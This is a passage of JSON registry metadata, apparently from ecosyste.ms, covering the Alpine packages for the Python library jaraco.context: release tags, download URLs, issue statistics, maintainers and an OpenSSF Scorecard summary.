ts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.566Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.22","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2396,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2025-06-08T15:34:11.475Z","updated_at":"2025-06-08T15:34:11.475Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.22","url":"https://pkgs.alpinelinux.org/packages?branch=v3.22","ecosystem":"alpine","default":false,"packages_count":26323,"maintainers_count":422,"namespaces_count":2,"keywords_count":4638,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1803},"icon_url":"https://github.com/alpinelinux.png","created_at":"2025-06-05T10:49:56.987Z","updated_at":"2026-08-24T05:06:25.345Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/namespaces"}},{"id":7779025,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-04-19T14:25:59.000Z","latest_release_published_at":"2023-04-19T14:25:59.000Z","latest_release_number":"4.3.0-r1","last_synced_at":"2026-03-21T14:34:01.433Z","created_at":"2023-05-22T14:27:16.768Z","updated_at":"2026-08-06T19:26:18.574Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using 